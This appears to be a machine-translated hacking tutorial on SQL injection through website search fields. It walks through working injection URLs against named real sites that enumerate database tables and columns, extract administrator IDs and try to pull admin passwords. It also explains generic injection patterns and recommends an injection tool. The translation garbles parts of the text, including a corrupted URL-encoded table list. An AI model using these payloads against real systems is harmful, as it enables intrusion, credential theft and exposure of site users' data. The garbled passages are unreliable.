Search Injection Technology

 

You can simply search for the existence or absence of a search injection vulnerability first. If an error occurs, the vulnerability exists in MySQL 90%. Then, search for %. If the returned result is normal, there is a hole in 95%.

 

Then search for a keyword, such as 2006. Normally, all 2006-related information is returned, search for 2006% and 1 = 1 and '%' = 'and 2006%' and 1 = 2 and '%' = '. If there are similarities and differences, there is a hole in 100%.

 

I can see that the holes mentioned above start to be scanned with nbsi, and the result always times out and is depressed. It seems that the manual brute-force attack is required...

 

Http://www.bkjia.com/product/list_search.aspx? Search = Donic % 'and user> 0 and' % '=' // obtain the current database account

 

Http://www.bkjia.com/product/list_search.aspx? Search = Donic % 'and db_name ()> 0 and' % '=' // obtain the current database name

 

Http://www.bkjia.com/product/list_search.aspx? Search = Donic % 'and (select count (*) from admin)> 0 and' % '=' // return the error page. It seems that there is no admin table.

 

Http://www.bkjia.com/product/list_search.aspx? Search = Donic % 'and (select top 1 name from lvhuana3.dbo. sysobjects where xtype = 'U' and status> 0)> 0 and '%' = '// obtain the first table name of the current database.

 

Http://www.bkjia.com/product/list_search.aspx? Search = Donic % 'and (select top 1 name from lvhuana3.dbo. sysobjects where xtype = 'U' and status> 0 and name not in ('codechang')> 0 and '%' = '// obtain the second table name of the current database.

 

Http://www.bkjia.com/product/list_search.aspx? Search = Donic % 'and (select top 1 name from lvhuana3.dbo. sysobjects where xtype = 'U' and status> 0 and name not in ('codechang', 'oldpoint')> 0 and '%' = '// obtain the third table name of the current database

 

<A href =" http://www.bkjia.com /Product/list_search.aspx? Search = Donic % 27and % 20 (select % 20top % 201% 20 name % 20 from % 20lvhuana3. dbo. sysobjects % 20 where % 20 xtype = % 27u % 27% 20and % 20 status % 3E0% 20and % 20 name % 20not % 20in (% 27 codechange % 27, % 27 oldpoint % 27, % 27tbl_admin % 27, % 27tbl_afterservice % 27, % 27tbl_agent % 27, % 27tbl_bank % 27, % 27tbl_board % 27, % 27tbl_board2% 27, % percent % 27, % percent % 27, % 27tbl_card % 27, % 27tbl_cart % 27, % 27tbl_catalogue % 27, % 27tbl_community % 27, % 27tbl_court % 27, % should % 27, % 27tbl_FAQ % 27, % should % 27, % 27tbl_mem_add % 27, % 27tbl_mem_main % 27, % 27tbl_mem_out % 27, % percent % 27, % 27tbl_mileage % 27, % 27tbl_notice % 27, % percent % 27, % 27tbl_ord_change % 27% 27tbl_ord_cs % 27, % 27tbl_ord_change % 27, % 27tbl_ord_cs % 27, % 27tbl_ord_main % 27, % limit % 27, % limit % 27, % limit % 27, % percent % 27, % percent % 27, % percent % 27, % 27tbl_ord_request % 27, % 27tbl_ord_user % 27, % 27tbl_partition % 27, % percent % 27, % 27tbl_prd_click % 27, % route % 27, % 27tbl_prd_grade % 27, % route % 27, % 27tbl_prd_model % 27, % 27tbl_recommand % 27, % 27tbl_saleshop % 27, % 27tbl_search % 27, % 27tbl_tax % 27, % 27tbl_zipcode % 27, % 27 tempDesc % 27, % 27tempdesc2% 27, % 27 tempmodel % 27, % 27 tempPrdMain % 27, % 27 tempPrdmodel % 27, % 27 tempsize % 27, % 27 tempstyle % 27, % 27 tmpordprd % 27, % 27tmpordprd2% 27, % 27trace1% 27 )) % 3E0% 20 and % 20% 27% % 27 = % 27 "target = _ blank> http://www.bkjia.com /Product/list_search.aspx? Search = Donic % 'and % 20 (select % 20top % 201% 20 name % 20 from % 20lvhuana3. dbo. sysobjects % 20 where % 20 xtype = 'U' % 20and % 20 status> 0% 20and % 20 name % 20not % 20in ('codechang', 'oldpoint ', 'tbl _ admin', 'tbl _ afterservice ', 'tbl _ agent', 'tbl _ Bank', 'tbl _ board', 'tbl _ board2 ', 'tbl _ brandbestleft', 'tbl _ brandbestRight ', 'tbl _ card', 'tbl _ cart', 'tbl _ catalogue', 'tbl _ communit ', 'tbl _ court', 'tbl _ estimate ', 'tbl _ FAQ', 'tbl _ mail_list ', 'tbl _ mem_add', 'tbl _ mem_main ', 'tbl _ mem_out ', 'tbl _ mem_rboard', 'tbl _ mileage', 'tbl _ notice', 'tbl _ ord_cash_receip ', 'tbl _ ord_change ''tbl _ ord_cs ', 'tbl _ ord_change', 'tbl _ ord_cs ', 'tbl _ ord_main', 'tbl _ ord_payment ', 'tbl _ ord_prd', 'tbl _ ord_prd_return ', 'tbl _ ord_refund', 'tbl _ ord_req_main ', 'tbl _ ord_req_prd', 'tbl _ ord_request ', 'tbl _ ord_user ', 'tbl _ partition', 'tbl _ prd_category', 'tbl _ prd_click', 'tbl _ prd_desc ', 'tbl _ prd_grade ', 'tbl _ prd_main ', 'tbl _ prd_model', 'tbl _ recommand ', 'tbl _ saleshop', 'tbl _ search', 'tbl _ tax ', 'tbl _ zipcode', 'tempdesc', 'tempdesc2', 'tempmodel', 'tempprdmain', 'tempprdmodel', 'tempsize', 'tempstyle', 'tmpordprd ', 'tmpordprd2 ', 'trace1')> 0% 20and % 20' % '=' // and so on.

 

In fact, the analysis shows that only the tbl_admin table is the most important. Then start the violent column name.

 

Http://www.bkjia.com/product/list_search.aspx? Search = Donic % 'and (select top 1 col_name (object_id ('tbl _ admin'), 1) from tbl_admin)> 0 and '%' = '// obtain the first column name c_employee_id In the table tbl_admin.

 

Http://www.bkjia.com/product/list_search.aspx? Search = Donic % 'and (select top 1 col_name (object_id ('tbl _ admin'), 2) from tbl_admin)> 0 and '%' = '// obtain the second column name c_employee_name In the table tbl_admin.

 

Http://www.bkjia.com/product/list_search.aspx? Search = Donic % 'and (select top 1 col_name (object_id ('tbl _ admin'), 3) from tbl_admin)> 0 and '%' = '// obtain the third column name c_password In the table tbl_admin.

 

Http://www.bkjia.com/product/list_search.aspx? Search = Donic % 'and (select top 1 col_name (object_id ('tbl _ admin'), 3) from tbl_admin)> 0 and '%' = '// get the fourth column name in the table tbl_admin. The column name c_level is violent. Hey hey, start the brute force Administrator account password.

 

Http://www.bkjia.com/product/list_search.aspx? Search = Donic % 'and (select top 1 c_employee_id from tbl_admin)> 0 and' % '=' // get the id of the first administrator as 943 hoon

 

Http://www.bkjia.com/product/list_search.aspx? Search = Donic % 'and (select c_employee_id from (select top 1 * from (select top 2 * from tbl_admin order by 1) T order by 1 desc) S)> 0 and '%' = '// obtain the id of the second administrator as champ

 

Http://www.bkjia.com/product/list_search.aspx? Search = Donic % 'and (select c_employee_id from (select top 1 * from (select top 3 * from tbl_admin order by 1) T order by 1 desc) S)> 0 and '%' = '// the id of the third administrator is clark.

 

Http://www.bkjia.com/product/list_search.aspx? Search = Donic % 'and (select c_employee_id from (select top 1 * from (select top 4 * from tbl_admin order by 1) T order by 1 desc) S)> 0 and '%' = '// obtain the id of the fourth administrator as hskim.

 

Http://www.bkjia.com/product/list_search.aspx? Search = Donic % 'and (select c_employee_id from (select top 1 * from (select top 4 * from tbl_admin order by 1) T order by 1 desc) S)> 0 and '%' = '// get the id of the fifth administrator as jajeong

 

Http://www.bkjia.com/product/list_search.aspx? Search = Donic % 'and (select top 1 c_c_password from tbl_admin)> 0 and' % '=' // This statement exposes the administrator password. Unfortunately, the normal page is returned, depressed ....

 

Another way .....

In addition, the search injection method supported by 2.3 of ah d is:

 

Generally, the search for a website is partially matched.

Is the vulnerability url A http://notebook.samsung.com.cn/news/news.aspx? Page = 1 & type = product & ST = title & SC =

Construct the injection statement Samsung % 'and 1 = 1 and' % '='

Samsung % 'and 1 = 2 and' % '='

We can see that the two return pages are different, indicating that the injection vulnerability Feature Word Written in the notebook is Samsung % 'and 1 = 1 and' % '= '.

 

We know that the general search code is written like this:

Select * from table name where field like '% keyword %'

In this way, all the matches before and after the keywords are created (% is used for all matches)

If the keywords are not filtered, You can construct them as follows:

Keyword = 'and [query condition] and' % 25' ='

In this way, the query becomes

Select * from table name where field like '%' and 1 = 1 and '%' = '%'

In this way, an SQL injection point is formed. Of course, it can be manually used, and nbsi can also be used ~~

There is no need for any injection type !~

If you do not believe it, please refer to the following statement of SQL Injection tianshu

Section 1: General steps of SQL Injection

First, judge the environment, find the injection point, and determine the database type. This is already discussed in the Getting Started article.

Secondly, according to the injection parameter type, the original appearance of the SQL statement is reconstructed in mind. There are three types of parameters:

(A) ID = 49 These injection parameters are numeric. The SQL statement is roughly as follows:

Select * from table name where field = 49

The injected parameter is ID = 49 And [query condition], that is, the generated statement:

Select * from table name where field = 49 And [query condition]

 

(B) Class = the injection parameters of the series are simplified. The SQL statements are roughly as follows:

Select * from table name where field = 'series'

The injected parameters are Class = series and [query conditions] and ''= ', that is, the generated statement:

Select * from table name where field = 'series' and [query conditions] and ''=''

(C) If parameters are not filtered during search, such as keyword = keyword, the original appearance of the SQL statement is roughly as follows:

Select * from table name where field like '% keyword %'

The injected parameter is keyword = 'and [query condition] and' % 25' = ', which is the generated statement:

Select * from table name where field like '%' and [query condition] and '%' = '%'

 

Of course, manual intervention is troublesome.

If tools are used, we recommend that you use nbsi tools. As a result, I feel that only nbsi is integrated with this technology and other software cannot be injected.

Write the injection point as long:

Http://www.bkjia.com/news. aspx? Page = 1 & type = product & ST = title & SC = %

Add a feature character.